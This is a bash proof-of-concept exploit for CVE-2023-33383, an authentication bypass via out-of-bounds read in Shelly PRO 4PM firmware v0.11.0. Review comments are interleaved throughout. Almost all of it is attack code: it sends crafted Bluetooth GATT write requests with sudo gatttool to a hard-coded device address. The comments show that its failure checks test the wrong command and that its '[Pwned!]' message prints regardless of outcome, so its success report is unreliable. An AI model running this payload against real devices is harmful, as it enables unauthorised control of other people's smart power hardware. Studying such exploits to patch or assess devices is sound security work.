## https://sploitus.com/exploit?id=PACKETSTORM:173954
#!/bin/bash  
  
# Exploit Title: Shelly PRO 4PM v0.11.0 - Authentication Bypass  
# Google Dork: NA  
# Date: 2nd August 2023  
# Exploit Author: The Security Team [exploitsecurity.io]  
# Exploit Blog: https://www.exploitsecurity.io/post/cve-2023-33383-authentication-bypass-via-an-out-of-bounds-read-vulnerability  
# Vendor Homepage: https://www.shelly.com/  
# Software Link: NA  
# Version: Firmware v0.11.0 (REQUIRED)  
# Tested on: MacOS/Linux  
# CVE : CVE-2023-33383  
  
# Script-wide settings. Everything here is plain data; nothing is executed.

# Empty IFS: no field splitting on unquoted expansions or on `read` from
# this point on.
IFS=''

# `false` is never assigned in the visible script, so this ends up as the
# empty string rather than a boolean.
failed="${false}"

# ANSI colour sequences kept with a literal backslash; they only become
# escape characters when printed through `echo -e`.
ENDCOLOR='\e[0m'
WHITE='\e[97m'
GREEN='\e[92m'
RED='\e[31m'

# Not referenced anywhere else in the visible script.
substring='Connection refused'
  
  
#######################################
# Clear the terminal and print the proof-of-concept's title box followed by
# the key-press prompt.
# Globals:   GREEN, RED, ENDCOLOR (read) - colour sequences with literal
#            backslashes, interpreted at print time
# Arguments: none
# Outputs:   six lines on stdout, after whatever `clear` emits
#######################################
banner()
{
  local border="[+]*********************************************************[+]"
  local row

  clear
  # Every box row is prefixed with GREEN; only the author row switches
  # colour part-way through.
  for row in \
    "${border}" \
    "| Author : Security Team [${RED}exploitsecurity.io${ENDCOLOR}] |" \
    "| Description: Shelly PRO 4PM - Out of Bounds |" \
    "| CVE: CVE-2023-33383 |" \
    "${border}"
  do
    printf '%b\n' "${GREEN}${row}"
  done
  printf '%b\n' "${GREEN}[Enter key to send payload]${ENDCOLOR}"
}
  
# Interactive driver: print the banner, wait for a single key press, then
# issue a fixed sequence of Bluetooth GATT writes with `gatttool`.
#
# NOTE(review): the Bluetooth address is hard-coded in every gatttool call
# below (presumably the author's own test unit - confirm), and each call is
# run through `sudo`.
# NOTE(review): the header comment names firmware v0.11.0 as the required
# (affected) build. The fixed release is not stated on this page; confirm it
# against the vendor advisory when checking your own devices.
banner
# Read exactly one character without echoing it.
read -s -n 1 key
# "x" quits before any Bluetooth traffic is sent.
if [ "$key" = "x" ]; then
exit 0;
# Enter leaves `key` empty. Any other key matches neither branch and the
# script ends without doing anything.
elif [ "$key" = "" ]; then
# Reachability probe: primary service discovery, killed after 5 seconds.
gattout=$(sudo timeout 5 gatttool -b c8:f0:9e:88:92:3e --primary)
# No output is treated as "device not reachable".
if [ -z "$gattout" ]; then
echo -e "${RED}Connection timed out${ENDCOLOR}"
# Exits 0 even on failure, so the exit status cannot tell outcomes apart.
exit 0;
else
# First characteristic write request (handle 0x000d). All gatttool output,
# including errors, is discarded. What the handles map to is not stated on
# this page; see the write-up linked in the header.
sudo gatttool -b c8:f0:9e:88:92:3e --char-write-req -a 0x000d -n 00000001 >/dev/null 2>&1
echo -ne "${GREEN}[Sending Payload]${ENDCOLOR}"
sleep 1
# NOTE(review): `$?` here is the exit status of `sleep 1`, not of gatttool,
# so this failure branch is effectively never taken.
if [ $? -eq 1 ]; then
# NOTE(review): not an assignment. Both variables are empty, so this expands
# to the bare word `=` and would be run as a command.
$failed=$true
exit 0;
fi
# Second write request (handle 0x0008, one byte).
sudo gatttool -b c8:f0:9e:88:92:3e --char-write-req -a 0x0008 -n ab >/dev/null 2>&1
sleep 1
# NOTE(review): same issue as above - this tests `sleep`, not the write.
if [ $? -eq 1 ]; then
$failed=$true
echo -e "${RED}[**Exploit Failed**]${ENDCOLOR}"
exit 0;
else
# Third write request (handle 0x0008, two bytes).
sudo gatttool -b c8:f0:9e:88:92:3e --char-write-req -a 0x0008 -n abcd >/dev/null 2>&1
sleep 1
# Cosmetic five-second progress dots.
for i in {1..5}
do
echo -ne "${GREEN}."
sleep 1
done
# NOTE(review): printed unconditionally. Nothing reads the device's state
# back, so this message is not evidence that a device is or is not affected;
# when assessing your own devices, rely on the installed firmware version.
echo -e "\n${WHITE}[Pwned!]${ENDCOLOR}"
fi
fi
fi